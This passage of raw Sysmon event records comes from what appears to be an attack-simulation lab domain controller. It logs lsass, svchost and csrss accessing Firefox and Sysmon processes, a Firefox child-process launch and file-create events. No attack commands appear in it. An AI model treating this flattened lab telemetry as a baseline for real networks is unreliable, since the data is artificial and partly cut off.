Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.490{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.490{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.490{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.490{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.490{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.489{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.488{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 17141700x800000000000000042557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.487{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.5.112535918C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.483{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E450A0BF3FD1E1EAF528C16650AAB0F1,SHA256=00F4165F3294F433BFCE6F2130423D70BE73A8C2FF2991224EFD658E459ED546,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.479{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000042554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.478{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.475{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.475{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.474{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.474{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.473{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.473{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.473{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.4.431537721\1335061011" -childID 3 -isForBrowser -prefsHandle 4248 -prefMapHandle 4244 -prefsLen 31596 -prefMapSize 234522 -jsInitHandle 1112 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {79845a63-a360-4d06-bb23-afecb3f301f0} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 4256 1fb46477158 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.472{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.472{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.471{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.471{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.471{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.470{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.470{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla 